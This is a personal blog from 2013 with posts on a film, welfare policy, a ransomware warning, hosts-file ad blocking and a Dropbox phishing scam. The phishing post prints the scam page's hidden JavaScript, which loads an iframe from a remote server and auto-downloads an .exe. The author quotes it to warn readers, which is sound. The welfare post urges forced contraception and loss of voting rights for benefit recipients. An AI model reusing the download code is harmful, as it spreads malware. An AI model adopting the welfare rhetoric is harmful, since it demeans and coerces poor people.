Wednesday, October 30, 2013

Your junk non-science of the morning


ZOMG!!!  A study has revealed the vital finding that smartphones can’t automagically detect which key you meant to hit *if you don’t actually hit the fucking thing accurately!!*


Holy shit, and here I have been for years expecting to just mash my palm randomly on the keyboard and get the precise outcome I wanted, despite only making a random and non-specific indication of my intentions!

Anyone would think I was in management or something.



Gravity sucks.

Went to see Gravity last night.

One of the shorter movies I have seen (91 minutes apparently), and not a bad thing either, because it cut out at least half an hour's opportunity for the producers and director to make ONE OF THE MOST BORING FILMS I HAVE EVER SEEN.

I mean, far out... there was about 20 minutes of interesting stuff at the start, then 5 minutes in the middle and another 10 at the end.  The rest of it was Sandra and George doing relationship counselling rubbish while floating against a backdrop of stars, woo.

Seriously, give this one a miss.  Not impressed.  Go and see White House Down for a good flick.

Tuesday, October 22, 2013

Stand up, Australia - YOU CAN BE PROUD.

What else could you possibly want as a tourism tag line??



Monday, October 21, 2013

Put me in charge

Put me in charge of Australia's handout welfare system.  I’d get rid of cash payments for starters, and replace them with a debit card system that only allows you to buy certain items.  It would allow you to buy fresh meat, vegetables, milk, bread, salads etc.  Buying E91 or ethanol fuel would be OK, premium will not be.  And you won't own a car that needs it – trust me.  It would not allow you to buy frozen pizza, KFC, chips, chocolate, tobacco or alcohol.  If you want to buy those, then get a job and pay for them yourself.

 

Put me in charge of Medicare. The first thing I’d do is to get women Norplant birth control implants or tubal ligations.  I'd test recipients for drugs, alcohol, and nicotine - if you are found with these in your system, your payments are suspended.  I'd document all tattoos and piercings, if you are found with more than you had last time you've obviously got more of our cash than you need.  If you want to reproduce or use drugs, alcohol, smoke or get tattoos and piercings, then get a job and pay for it out of your own pocket.

 

Put me in charge of subsidised housing. Ever live in a military barracks?  You will maintain our property in a clean and good state of repair.  "Your" (read: our) house will be subject to inspections anytime, and possessions will be inventoried.  If you want a plasma TV or Xbox 360, then get a job and your own place on your own dollar.  Are you seeing a pattern yet?

 

Don't even think about letting drugs or alcohol be found in your subsidised housing.  If so, you're cut off for a year.  If found a second time, you're cut off for two years.  After that, I lose my normally cheerful disposition and it really starts to hurt.

 

You will either present a payslip from a job every time you want to collect a welfare handout or you will report to a government job. It may be cleaning the roads and parks of rubbish, painting and repairing public housing, but trust me - we'll find something.  I will also sell your 22 inch rims and low profile tyres and your car stereo system and put that money toward the welfare of someone who actually needs it.

 

Before you think that I’m violating your "rights", realize that all of the above is voluntary!  It's just that if you want our money, accept our rules.  Before you say that this is "demeaning" and lowers your "self esteem", consider that it wasn’t that long ago that taking someone else’s money for doing absolutely nothing was considered demeaning and lowered self esteem.

 

If we are expected to pay for other people’s mistakes we should at least attempt to make them learn from their bad choices. The current system rewards them for continuing to make bad choices and just perpetuates the cycle of welfare entitlement.

 

Oh yeah, one last thing - while receiving a handout you no longer can vote.  Voting is a privilege reserved for people who contribute to society and therefore earn a say in how it is structured, governed and run.  If you want to vote, then get a job.

Saturday, October 19, 2013

Saturday morning scammers and scumbags

Now here’s a subtle little scam.

Got an e-mail allegedly from Dropbox asking me to “update my password as I hadn’t logged in for a while.”  Remarkably for once I actually do use that service, but there’s a systray app that logs in automatically on boot, so red flag #1.

Unremarkably, the nice, friendly login button in the e-mail points to a compromised webserver, nothing special there.  What *was* interesting though was the peripheral approach taken to try to suck people in.  These pricks are really getting very subtle at this sort of thing.

Instead of the usual fake-landing-page-designed-to-look-real, I got a very realistic redirection delay, got to love the code snippet that does it:

window.onload = function() {
                 // It's "cool" to let user wait 2 more seconds :/
            }

You then get a nice, friendly page warning you of a security vulnerability with your PC - what helpful people!




Every single internet user in the world is constantly bombarded with security warning, dire threats of armageddon to their data and PC, and is probably quite used to doing these sorts of updates as a knee-jerk reaction, right?

(The weakness here is that Chrome updates itself automatically, and who in their right mind would want to run IE on Linux??).  But then again this sort of scam isn't intended to catch people who know what they are doing anyway...

Of course, while the graphics themselves are simply hotlinked directly off http://updatebrowser.net, they point to a dodgy Russian webserver, and all of them to the same file http://dynamooblog.ru:8080/ieupdate[URL breaker].exe.

What's *really* fun is this little snippet of code hidden at the end of the page:

if(OSName=="Windows") {
ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://dynamooblog.ru:8080/dropbox/check[\URL breaker].php");
   ifrm.style.width = 1+"px";
   ifrm.style.height = 1+"px";
   document.body.appendChild(ifrm);
setTimeout(function() {
   document.getElementById('container').style.display = 'block';
   setTimeout(function() {
window.location = 'http://dynamooblog.ru:8080/ieupdate[URL breaker].exe';
   },50000);
  
                }, 5000);
}


That little gem automatically initiates the download of the file to a Windows system anyway after 50 seconds... no interaction required from the user, only leaving the browser open long enough.  I only caught it because FDM caught the download initiation.

Now imagine what would have happened if the file auto-ran on completion of download...

Tuesday, October 15, 2013

New ransomware

Hi guys,

Something to be aware of - a new ransomware tool doing the rounds, not only encrypts your local disks... but any writeable network destinations the PC has write access to.  Very, very nasty.  My NAS is read-only via HTTP/browse for this very reason, it's only writeable via FTP.

No version of Windows is immune, UAC won't stop it, and AV won't detect it currently.  You don't want this.  Apparently the most common method of delivery is as [filename].pdf.exe, and in moron-mode Windows hides the .exe extension as "known".  Watch what you click.

http://www.reddit.com/r/sysadmin/comments/1mizfx/proper_care_feeding_of_your_cryptolocker/

No surprise, Tynt have friends

Following on from when I discovered Tynt and their spammy little ways last year, it probably shouldn't have come as a surprise to discover that other companies have decided to have a swim in the same pond of slime.

The Australian is apparently now using an effectively identical service called CopyNShare, which appends a forced (and no doubt trackable) URL to the end of anything you copy off their site, so copying this:

FORMER communications minister Stephen Conroy was the "root cause" of Labor's "abysmal" handling of the National Broadband Network, according to construction industry heavyweight David Chandler.

Ends up as:

FORMER communications minister Stephen Conroy was the "root cause" of Labor's "abysmal" handling of the National Broadband Network, according to construction industry heavyweight David Chandler. - See more at: http://www.theaustralian.com.au/business/in-depth/conroy-root-cause-of-nbn-woes/story-e6frgaif-1226739889457#sthash.5da9bT4Q.dpuf


Why does this irritate me?  Apart from my normal objection at every marketer in the world salivating at yet another opportunity to shove advertising in my face, the appended URL makes it a little more work when using the copy-search trick to bypass the laughably insecure News Ltd paywall.

During some searching for the CopyNShare servers so I could blackhole them, I came across this incredibly useful service.  Basically, they regularly publish a hosts file that you can use to blackhole traffic from a huge range of adware infestations, and just to add to the value, they also block all the spyware and malware C&C servers that they know of.  Absolutely brilliant.


Here's a sample from the start of my current hosts file to give you the idea:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost

127.0.0.1  localhost

::1  localhost #[IPv6]

# [Start of entries generated by MVPS HOSTS]
#
# [Misc A - Z]
127.0.0.1  fr.a2dfp.net
127.0.0.1  m.fr.a2dfp.net
127.0.0.1  ad.a8.net
127.0.0.1  asy.a8ww.net
127.0.0.1  abcstats.com
127.0.0.1  a.abv.bg
127.0.0.1  adserver.abv.bg
127.0.0.1  adv.abv.bg
# [end of entries generated by MVPS HOSTS]